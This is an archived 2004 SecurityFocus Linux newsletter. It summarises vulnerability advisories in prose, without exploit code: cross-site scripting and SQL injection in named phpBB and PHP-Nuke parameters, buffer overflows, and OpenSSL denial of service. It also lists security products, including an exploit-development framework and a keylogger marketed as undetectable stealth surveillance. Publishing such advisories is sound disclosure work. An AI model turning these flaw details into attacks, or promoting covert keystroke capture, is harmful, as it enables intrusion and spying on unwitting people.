Date: Mon, 22 Mar 2004 13:13:10 -0700 (MST)
From:"John Boletta" <jboletta@securityfocus.com>
To:linux-secnews@securityfocus.com
Subject: SecurityFocus Linux Newsletter #176

SecurityFocus Linux Newsletter #176
------------------------------------

This issue is sponsored by: Reasoning Inc.

Enter to win a free application-level software security inspection -- a
$20,000 value!

Reasoning will inspect up to 100,000 lines of your toughest C/C++ code,
pinpointing the exact location of security vulnerabilities that are the
leading target of hackers. Experience the power that application 
scanning
and dynamic testing tools can't match.

Enter to win a free software security inspection now:

http://sic-em.steelbrick.com/REA2302/securityfocus-linux.jsp
------------------------------------------------------------------------

I. FRONT AND CENTER
     1. Forensic Analysis of a Live Linux System, Pt. 1
     2. Detection of SQL Injection and Cross-site Scripting Attacks
     3. The 12KB Bomb
II. LINUX VULNERABILITY SUMMARY
     1. Chaogic Systems VHost Unspecified Cross-Site Scripting Vulne...
     2. Emumail EMU Webmail Multiple Vulnerabilities
     3. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
     4. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
     5. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
     6. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
     7. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
     8. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
     9. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
     10. Lim Unlimited Crafty Command Line Local Buffer Overflow 
Vuln...
     11. PhpBB admin_words.php Multiple Vulnerabilities
     12. ClamAV RAR Archive Remote Denial Of Service Vulnerability
     13. OpenSSL Denial of Service Vulnerabilities
III. LINUX FOCUS LIST SUMMARY
     1. ModSSL - Knoppix 3.3 (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Immunity CANVAS
     2. SecretAgent
     3. Cyber-Ark  Inter-Business Vault
     4. EnCase Forensic Edition
     5. KeyGhost SX
     6. SafeKit
V. NEW TOOLS FOR LINUX PLATFORMS
     1. Qingy Is Not Getty v0.4.0
     2. Network Packet Capture Facility for Java v0.01.15
     3. NetMRG v0.14
     4. Syslog Management Tool v1.0
     5. Prismstumbler v0.7.1
     6. mysqlRadiusd v0.8
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION


I. FRONT AND CENTER
-------------------
1. Forensic Analysis of a Live Linux System, Pt. 1
By Mariusz Burdach

This article is the first of a two-part series that provides 
step-by-step
instructions on forensics of a live Linux system that has been recently
compromised.

http://www.securityfocus.com/infocus/1769

2.Detection of SQL Injection and Cross-site Scripting Attacks
By K. K. Mookhey and Nilesh Burghate

This article discusses techniques to detect SQL Injection and Cross 
Site
Scripting (CSS) attacks against your networks using regular expressions
with the open-source IDS, Snort.

http://www.securityfocus.com/infocus/1768

2. The 12KB Bomb
By Kelly Martin

It only takes a 12KB virus for total system compromise and a highly
effective spam engine. Anyone can make one. Some assembly required.

http://www.securityfocus.com/columnists/228


II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Chaogic Systems VHost Unspecified Cross-Site Scripting Vulne...
BugTraq ID: 9860
Remote: Yes
Date Published: Mar 12 2004
Relevant URL: http://www.securityfocus.com/bid/9860
Summary:
It has been reported that the vHost web based interface is prone to a
remote cross-site scripting vulnerability.  This issue is due to a 
failure
of the application to properly sanitize user input.

The technical details of this issue cannot be currently described due 
to
insufficient details, however this BID will be updated as new 
information
becomes available.

Attackers may exploit this vulnerability to steal authentication
credentials. Other attacks may also be possible.

2. Emumail EMU Webmail Multiple Vulnerabilities
BugTraq ID: 9861
Remote: Yes
Date Published: Mar 12 2004
Relevant URL: http://www.securityfocus.com/bid/9861
Summary:
Multiple vulnerabilities have been identified in the application that 
may
allow an attacker to carry out cross-site scripting attacks and 
disclose
the path to the victim's home directory.  The issues are reported to 
exist
in the login script, 'emumail.fcgi' script and the 'init.emu' sample
script.

EMU Webmail 5.2.7 has been reported to be affected by these issues.

3. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
BugTraq ID: 9865
Remote: Yes
Date Published: Mar 13 2004
Relevant URL: http://www.securityfocus.com/bid/9865
Summary:
It has been reported that one of the scripts included with phpBB is 
prone
to a cross-site scripting vulnerability.  According to the author of 
the
report, the script "viewtopic.php" returns the value of the HTML 
variable
"postdays" to the client as its output without encoding it or otherwise
removing potentially hostile content.  This can be exploited by
constructing malicious links with the malicious "postdays" variable 
value
embedded as a GET request style HTML variable.  If the target user 
visits
such a link, the malicious, externally created content supplied in the
link will be rendered (or executed, in the case of script code) as part 
of
the viewtopic.php document and within the context of the vulnerable
website (including the phpBB forum).

4. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
BugTraq ID: 9866
Remote: Yes
Date Published: Mar 13 2004
Relevant URL: http://www.securityfocus.com/bid/9866
Summary:
It has been reported that one of the scripts included with phpBB is 
prone
to a cross-site scripting vulnerability.  According to the author of 
the
report, the script "viewforum.php" returns the value of the HTML 
variable
"topicdays" to the client as its output without encoding it or 
otherwise
removing potentially hostile content.  This can be exploited by
constructing malicious links with the malicious "topicdays" variable 
value
embedded as a GET request style HTML variable.  If the target user 
visits
such a link, the malicious, externally created content supplied in the
link will be rendered (or executed, in the case of script code) as part 
of
the viewtopic.php document and within the context of the vulnerable
website (including the phpBB forum).

5. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
BugTraq ID: 9870
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9870
Summary:
It has been reported that Check Point Firewall-1 SmartDashboard may be
prone to a buffer overflow vulnerability that may allow an attacker to
execute arbitrary code on a vulnerable system in order to gain
unauthorized access.  The issue is reported to present itself when the
SmartTracker utility is used to add a firewall filter for Firewall-1.  
An
attacker may be able to cause a buffer overflow condition by supplying 
an
excessive amount of data via the filter line.

It is likely that access to SmartDashboard requires administrator
credentials, in which case this issue would not be considered a
vulnerability.  This has not been confirmed at the moment.  Due to a 
lack
of information further details cannot be outlined at the moment.  This 
BID
will be updated as more information becomes available.

This vulnerability is reported to affect SmartDashboard supplied with
Check Point Software NG-AI R54 and NG-AI R55, however, other versions
could be affected as well.

6. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
BugTraq ID: 9873
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9873
Summary:
It has been reported that YaBB and YaBB SE are prone to multiple
cross-site scripting vulnerabilities.  These issues are due to a 
failure
of the applications to properly validate URI supplied user input.

Attackers may exploit this vulnerability to steal authentication
credentials. Other attacks may also be possible.

7. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
BugTraq ID: 9877
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9877
Summary:
A problem has been identified in several different SOAP servers when
handling certain types of requests. Because of this, it is possible for 
an
attacker to force a denial of service on systems using a vulnerable
implementation.

This BID will be updated as further details regarding this 
vulnerability
are made public.

8. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
BugTraq ID: 9879
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9879
Summary:
It has been reported that PHP-Nuke may be prone to multiple cross-site
scripting vulnerabilities.  These vulnerabilities occur due to
insufficient sanitization of user-supplied data via the 'Your Name',
'nicname', 'fname', 'ratenum', and 'search' fields of 'modules.php'
script.  Exploitation could allow for theft of cookie-based 
authentication
credentials. Other attacks are also possible.

PHP-Nuke 7.1.0 has been reported to be prone to these issues, however, 
it
is possible that other versions are affected as well.  These issues are
undergoing further analysis.  These issues will be separated into
individual BIDs once analysis is complete.

9. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
BugTraq ID: 9883
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9883
Summary:
A vulnerability has been reported to exist in the software that may 
allow
a remote user to inject malicious SQL syntax into database queries. The
problem reportedly exists in one of the parameters of the search.php
script. This issue is caused by insufficient sanitization of 
user-supplied
data. A remote attacker may exploit this issue to influence SQL query
logic to disclose sensitive information that could be used to gain
unauthorized access.

10. Lim Unlimited Crafty Command Line Local Buffer Overflow Vuln...
BugTraq ID: 9893
Remote: No
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9893
Summary:
It has been reported that Crafty game program may be prone to a local
buffer overflow vulnerability that may allow an attacker to execute
arbitrary code in order to gain elevated privileges.  The issue 
presents
itself due to insufficient bounds checking performed by 'crafty.bin' on
user-supplied data via the command line.

This problem could result in the execution of arbitrary code in the
context of the vulnerable process, and may result in a local user 
gaining
elevated privileges.

Crafty versions 19.3 and prior are reportedly affected by this issue.

11. PhpBB admin_words.php Multiple Vulnerabilities
BugTraq ID: 9896
Remote: Yes
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9896
Summary:
It has been reported that PhpBB may be prone to multiple 
vulnerabilities
that may allow an attacker to carry out SQL injection and cross-site
scripting attacks.  These issues are reported to affect the 'id' 
parameter
of 'admin_words.php' module.  The SQL injection attack requires
administrator level access.

PhpBB version 2.0.6c has been reported to be affected by these issues,
however, it is possible that other versions are affected as well.

12. ClamAV RAR Archive Remote Denial Of Service Vulnerability
BugTraq ID: 9897
Remote: Yes
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9897
Summary:
ClamAV has been reported prone to a remote denial of service
vulnerability. The issue presents itself when a RAR archive that is
created by variants of the W32.Beagle.A@mm worm (MCID 2443) is
encountered.

13. OpenSSL Denial of Service Vulnerabilities
BugTraq ID: 9899
Remote: Yes
Date Published: Mar 17 2004
Relevant URL: http://www.securityfocus.com/bid/9899
Summary:
Three security vulnerabilities have been reported to affect OpenSSL.  
Each
of these remotely exploitable issues may result in a denial of service 
in
applications which use OpenSSL.

The first vulnerability is a NULL pointer assignment that can be 
triggered
by attackers during SSL/TLS handshake exchanges.  The CVE candidate 
name
for this vulnerability is CAN-2004-0079.  Versions 0.9.6c to 0.9.6k
(inclusive) and from 0.9.7a to 0.9.7c (inclusive) are vulnerable.

The second vulnerability is also exploited during the SSL/TLS 
handshake,
though only when Kerberos ciphersuites are in use. The vendor has 
reported
that this vulnerability may not be a threat to many as it is only 
present
when Kerberos ciphersuites are in use, an uncommon configuration.  The 
CVE
candidate name for this vulnerability is CAN-2004-0112.  Versions 
0.9.7a,
0.9.7b, and 0.9.7c are affected.

This entry will be retired when individual BID records are created for
each issue.

*Note: A third denial of service vulnerability included in the
announcement was discovered affecting 0.9.6 and fixed in 0.9.6d.  The 
CVE
candidate name for this vulnerability is CAN-2004-0081.


III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. ModSSL - Knoppix 3.3 (Thread)
Relevant URL:

http://www.securityfocus.com/archive/91/357693


IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Immunity CANVAS
By: Immunity, Inc.
Platforms: Linux, Windows 2000
Relevant URL: http://www.immunitysec.com/CANVAS/
Summary:

Immunity CANVAS is 100% pure Python, and every license includes full
access to the entire CANVAS codebase. Python is one of the easiest
languages to learn, so even novice programmers can be productive on the
CANVAS API, should they so chose.

Immunity CANVAS is both a valuable demonstration tool for enterprise
information security teams or system adminstrators, and an advanced
development platform for exploit developers, or people learning to 
become
exploit developers.

2. SecretAgent
By: Information Security Corporation (ISC)
Platforms: Linux, MacOS, UNIX, Windows 2000, Windows 95/98, Windows NT,
Windows XP
Relevant URL: 
http://www.infoseccorp.com/products/secretagent/contents.htm
Summary:

SecretAgent is a file encryption and digital signature utility, 
supporting
cross-platform interoperability over a wide range of platforms: 
Windows,
Linux, Mac OS X, and UNIX systems.

It's the perfect solution for your data security requirements, 
regardless
of the size of your organization.

Using the latest recognized standards in encryption and digital 
signature
technology, SecretAgent ensures the confidentiality, integrity, and
authenticity of your data.

3. Cyber-Ark  Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL:
http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary:

Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business
Vault, an information security solution that enables organizations to
safely overcome traditional network boundaries in order to securely 
share
business information among customers, business partners, and remote
branches. It provides a seamless, LAN-like experience over the Internet
that includes all the security, performance, accessibility, and ease of
administration required to allow organizations to share everyday
information worldwide. To learn more about these core attributes of the
Inter-Business Vault click on the relevant link below:

4. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS, 
Solaris,
UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary:

EnCase Forensic Edition Version 4 delivers the most advanced features 
for
computer forensics and investigations. With an intuitive GUI and 
superior
performance, EnCase Version 4 provides investigators with the tools to
conduct large-scale and complex investigations with accuracy and
efficiency. Guidance Software?s award winning solution yields 
completely
non-invasive computer forensic investigations while allowing examiners 
to
easily manage large volumes of computer evidence and view all relevant
files, including "deleted" files, file slack and unallocated space.

The integrated functionality of EnCase allows the examiner to perform 
all
functions of the computer forensic investigation process. EnCase's
EnScript, a powerful macro-programming language and API included within
EnCase, allows investigators to build customized and reusable forensic
scripts.

5. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, 
Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:

KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely 
undetectable
by software scanners and provides you with one of the most powerful
stealth surveillance applications offered anywhere.

Because KeyGhost uses STRONG 128-Bit encryption to store the recorded 
data
in it?s own internal memory (not on the hard drive), it is impossible 
for
a network intruder to gain access to any sensitive data stored within 
the
device.

6. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:

Evidian's SafeKit technology makes it possible to render any 
application
available 24 hours per day. With no extra hardware: just use your 
existing
servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to 
do
is add more standard servers into the cluster. With the load balancing
features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to 
serve
your users.


V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. Qingy Is Not Getty v0.4.0
By: Noberasco
Relevant URL: http://qingy.sourceforge.net/
Platforms: Linux, POSIX
Summary:

qingy is a replacement for getty. It uses DirectFB to provide a fast, 
nice
GUI without the overhead of the X Windows System. It allows the user to
log in and start the session of his choice (text console, GNOME, KDE,
wmaker, etc.).

2. Network Packet Capture Facility for Java v0.01.15
By: patrick charles
Relevant URL: http://jpcap.sourceforge.net
Platforms: Linux, Solaris, SunOS
Summary:

Network Packet Capture Facility for Java is a set of Java classes that
provide an interface and system for network packet capture. A protocol
library and tool for visualizing network traffic is included. It 
utilizes
libpcap, a widely used system library for packet capture.

3. NetMRG v0.14
By: Brady Alleman
Relevant URL: http://www.netmrg.net/
Platforms: Linux
Summary:

NetMRG is a network monitoring, reporting, and graphing system. Using
MySQL, PHP, C++, pthreads, and RRDTOOL, it is capable of monitoring
thousands of variables on five-minute intervals. Graph templating 
allows
network admins to begin monitoring devices with minimal overhead. 
NetMRG
is also capable of responding to programmable events, such as variables
exceeding accepted tolerances. It can accommodate server hosting and
Internet service provider environments with different users allowed to
view only their own equipment's graphs.

4. Syslog Management Tool v1.0
By: Jeremy Guthrie
Relevant URL: http://smt.dangermen.com
Platforms: FreeBSD, Linux, NetBSD, OpenBSD
Summary:

The Syslog Management Tool (SMT) is a Web-based system that collects
syslog messages using a modified version of Modular Syslog. It 
processes
them for errors and generate alerts, launches programs, or sends emails
based on user-defined actions. Since it uses a Web console, rules, 
hosts,
and much more can be centrally managed. It is designed to be disaster
resilient by distributing components throughout a global enterprise to
survive Web console loss, database loss, or syslog server loss.

5. Prismstumbler v0.7.1
By: Florian Boor
Relevant URL: http://prismstumbler.sourceforge.net/
Platforms: Linux, POSIX
Summary:

Prismstumbler is software which finds 802.11 (W-LAN) networks. It comes
with an easy to use GTK2 frontend and is small enough to fit on a small
portable system. It is designed to be a flexible tool to find as much
information about wireless LAN installations as possible. Because of 
its
client-server architecture the scanner engine may be used for different
frontends.

6. mysqlRadiusd v0.8
By: Gary Wallis <ggw@anet.net>
Relevant URL: http://openisp.net/mysqlRadius
Platforms: FreeBSD, Linux, Solaris, SunOS, UNIX
Summary:

mysqlRadiusd is a RADIUS daemon based on the 1.6.6 Cistron distribution
and the mySQL patches that has been modified for use with the mysqlISP 
GPL
ISP management software system. It is very stable and can handle large
ISPs easily while pumping mass accounting records into mysqlRadacct
subsystem at a tremendous rate from even multi-server clusters.

VII. SPONSOR INFORMATION
-----------------------
This issue is sponsored by: Reasoning Inc.

Enter to win a free application-level software security inspection -- a
$20,000 value!

Reasoning will inspect up to 100,000 lines of your toughest C/C++ code,
pinpointing the exact location of security vulnerabilities that are the
leading target of hackers. Experience the power that application 
scanning
and dynamic testing tools can't match.

Enter to win a free software security inspection now:

http://sic-em.steelbrick.com/REA2302/securityfocus-linux.jsp
------------------------------------------------------------------------